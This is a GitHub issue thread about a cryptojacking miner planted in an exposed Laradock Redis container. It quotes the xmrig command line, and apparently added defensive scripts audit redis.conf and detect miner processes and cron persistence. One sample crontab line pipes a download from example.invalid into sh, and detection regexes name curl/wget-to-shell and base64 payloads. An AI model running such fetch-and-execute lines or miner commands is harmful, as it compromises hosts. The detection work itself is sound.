
Cryptojacking attack via Redis container #2346

Closed
sondoha opened this issue Oct 31, 2019 · 6 comments
sondoha commented Oct 31, 2019

Info:

  • Docker version ($ docker --version):
  • Laradock commit ($ git rev-parse HEAD):
  • System info (Mac, PC, Linux):
  • System info disto/version:

Issue:

Hello,

I've been using Laradock for a while. It was great!

But just realized that Redis Docker container had been attacked. All 16 CPU cores were up to 100%.

Using the htop command, I see something like this:

xmrig-notls -o pinto.mamointernet.icu:4444 -u ver1 -p ver1 --max-cpu-usage 100 --donate-level 1 -B

Has anyone faced this issue? And how did you deal with it?

PS: The same issue has been reported here:

https://medium.com/threat-intel/cryptojacking-coin-mining-cybercrime-234895bec6e1
https://gitter.im/tiangolo/fastapi?at=5d89d0b78521b34d91803d83


Expected behavior:


Reproduce:


Relevant Code:

// place a code sample here
lanphan (Contributor) commented Oct 31, 2019

Hi,
I think you should secure your network more by configuring your firewall / gateway / proxy more securely (allow only ports 80 and 443 out, for example).
In case you have a more secure configuration for Redis, please share it with us.
Thanks.
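
lanphan asks for a more secure Redis configuration. The script below is an added example, not code from this issue or from Laradock, that audits a redis.conf for the four settings which leave an instance open to anyone who can reach the port: no requirepass, listening on every interface, protected-mode switched off, and the CONFIG command still reachable under its real name. The two sample config files it writes (weak.conf and hardened.conf) are constructed for the demo; the hostnames and passwords in them are placeholders.

```shell
#!/bin/sh
# Added example, not Laradock's or Redis' own code: audit a redis.conf for the
# settings that leave an instance open to any client that can reach the port.
# Findings are printed one per line, prefixed "FINDING:".

audit_redis_conf() {
  conf="$1"
  # Drop comment and blank lines so a commented-out "requirepass" is not
  # mistaken for a live one.
  body=$(sed -e '/^[[:space:]]*#/d' -e '/^[[:space:]]*$/d' "$conf")

  # 1. No password: every client that reaches the port has full control,
  #    including CONFIG SET and SAVE.
  if ! printf '%s\n' "$body" | grep -qE '^requirepass[[:space:]]+[^[:space:]]'; then
    echo "FINDING: requirepass is not set"
  fi

  # 2. Listening on all interfaces (no bind directive, or bind 0.0.0.0).
  if ! printf '%s\n' "$body" | grep -qE '^bind[[:space:]]'; then
    echo "FINDING: no bind directive, Redis listens on every interface"
  elif printf '%s\n' "$body" | grep -qE '^bind[[:space:]].*0\.0\.0\.0'; then
    echo "FINDING: bind includes 0.0.0.0"
  fi

  # 3. protected-mode no removes the loopback-only fallback Redis applies
  #    when neither bind nor requirepass is configured.
  if printf '%s\n' "$body" | grep -qiE '^protected-mode[[:space:]]+no'; then
    echo "FINDING: protected-mode no"
  fi

  # 4. CONFIG still reachable by name: a client can repoint dir/dbfilename
  #    and make Redis write files wherever the process has access.
  if ! printf '%s\n' "$body" | grep -qiE '^rename-command[[:space:]]+CONFIG[[:space:]]'; then
    echo "FINDING: CONFIG command not renamed or disabled"
  fi
}

# Number of FINDING lines for a config file (prints "0" when clean).
count_findings() {
  audit_redis_conf "$1" | grep -c '^FINDING' || true
}

# Two constructed sample configs: the weak one mirrors a bare redis-server
# with no password, the hardened one carries the directives the audit expects.
make_sample_confs() {
  sample_dir=$(mktemp -d)
  cat > "$sample_dir/weak.conf" <<'EOF'
# constructed sample: no password, every interface, CONFIG exposed
bind 0.0.0.0
protected-mode no
port 6379
EOF
  cat > "$sample_dir/hardened.conf" <<'EOF'
# constructed sample: the placeholder password must be replaced
bind 127.0.0.1
protected-mode yes
port 6379
requirepass change-me-to-a-long-random-secret
rename-command CONFIG ""
rename-command DEBUG ""
EOF
  echo "$sample_dir"
}

# Stand-alone demo over the two samples.
demo_dir=$(make_sample_confs)
for f in weak hardened; do
  echo "== $f.conf: $(count_findings "$demo_dir/$f.conf") finding(s)"
  audit_redis_conf "$demo_dir/$f.conf"
done
```

Two caveats for a docker-compose setup like Laradock's. The official Redis image accepts the same directives on the command line (for example `redis-server --requirepass "$REDIS_PASSWORD"`), so the hardening does not need a config file. And a compose port mapping of `6379:6379` publishes the port on every host interface; Docker inserts its own iptables rules for published ports, which a host firewall such as ufw does not filter by default, so "banning the port" on the host may not do what it appears to. Mapping `127.0.0.1:6379:6379` instead keeps the port on loopback.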

BernardoMG commented
Hi,
I'm facing the same issue on an EC2 instance. @sondoha any tip on how to remove the trojan?

sondoha (Author) commented Nov 8, 2019

It is still happening to me, even though I banned the Redis port from the public.

So I use the sync queue driver instead of redis. Sure, it is for development only; I do not have any solution for production at the moment.

BernardoMG commented Nov 8, 2019

Yes, banning Redis port isn't enough @sondoha.

We managed to fix it by:

  1. Launching a new instance with the most recent Redis version;
  2. Cleaning weird crontab entries (immediately after the previous step);
  3. Deleting networkservice if it exists

This instance looks good, no weird process consuming CPU 🙂
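
BernardoMG's steps 2 and 3 exist because a cron entry and a dropped binary outlive a container restart and a closed port, which also matches sondoha's report that the miner came back after the port was banned. The script below is an added example, not from this issue or from Laradock, with triage helpers for that cleanup: it flags miner processes and suspicious crontab entries and rewrites the crontab without them. It runs here on two constructed listings (the xmrig command line is the one quoted in the issue; the other process lines, the certbot job and the example.invalid URL are made up); on a live host, feed it the output of `ps -eo pid,user,args` and `crontab -l`, run both as root and as the user the miner runs under.

```shell
#!/bin/sh
# Added example, not the issue's or Laradock's code: triage helpers behind the
# three-step fix above. Each function reads a listing from a file so it runs
# on constructed samples here and on `ps -eo pid,user,args` / `crontab -l`
# output on a live host.

# Miner processes: the binary name from the issue plus the xmrig option set,
# so a renamed binary started with the same flags still shows up.
MINER_PATTERN='xmrig|--donate-level|-o [^ ]+:[0-9]+ .*-u '

# Cron persistence: entries that pipe downloaded content into a shell, decode
# a base64 payload, or run the "networkservice" binary removed in step 3.
CRON_PATTERN='(curl|wget)[^|]*\|[[:space:]]*(sh|bash)|base64 (-d|--decode)|networkservice'

find_miner_procs() {
  grep -E "$MINER_PATTERN" "$1" || true
}

find_suspicious_cron() {
  grep -E "$CRON_PATTERN" "$1" || true
}

# Step 2 as a file rewrite: everything except the flagged entries. Review the
# output first, then install it with: clean_crontab crontab.txt | crontab -
clean_crontab() {
  grep -vE "$CRON_PATTERN" "$1" || true
}

count_miner_procs() {
  find_miner_procs "$1" | wc -l | tr -d ' '
}

count_suspicious_cron() {
  find_suspicious_cron "$1" | wc -l | tr -d ' '
}

# Constructed listings. The xmrig line is the command line quoted in the
# issue; the rest is made up, and example.invalid is a reserved name.
write_samples() {
  sample_dir=$(mktemp -d)
  cat > "$sample_dir/ps.txt" <<'EOF'
  PID USER     COMMAND
    1 root     /usr/local/bin/docker-entrypoint.sh redis-server
    7 redis    redis-server *:6379
  412 redis    xmrig-notls -o pinto.mamointernet.icu:4444 -u ver1 -p ver1 --max-cpu-usage 100 --donate-level 1 -B
  430 redis    sh -c sleep 30
EOF
  cat > "$sample_dir/crontab.txt" <<'EOF'
# constructed crontab dump
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://example.invalid/update.sh | sh
*/15 * * * * /tmp/networkservice
EOF
  echo "$sample_dir"
}

# Stand-alone demo over the constructed listings.
samples=$(write_samples)
echo "miner processes:"
find_miner_procs "$samples/ps.txt"
echo "suspicious cron entries:"
find_suspicious_cron "$samples/crontab.txt"
echo "crontab after cleanup:"
clean_crontab "$samples/crontab.txt"
```

Kill the flagged process before installing the cleaned crontab, otherwise the running miner can rewrite it. Check /etc/cron.d and the per-user crontabs inside the container as well as on the host, and treat a host whose crontab was modified as compromised rather than cleaned: step 1 above, a fresh instance, is the reliable part of the fix, and the other two are what to verify on it.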

stale bot commented Feb 7, 2020

Hi 👋 this issue has been automatically marked as stale 📌 because it has not had recent activity 😴. It will be closed if no further activity occurs. Thank you for your contributions ❤️.

@stale stale bot added the Stale label Feb 7, 2020
stale bot commented Feb 28, 2020

Hi again 👋 we would like to inform you that this issue has been automatically closed 🔒 because it has not had recent activity during the stale period. We really appreciate your contributions, and look forward to more in the future 🎈.
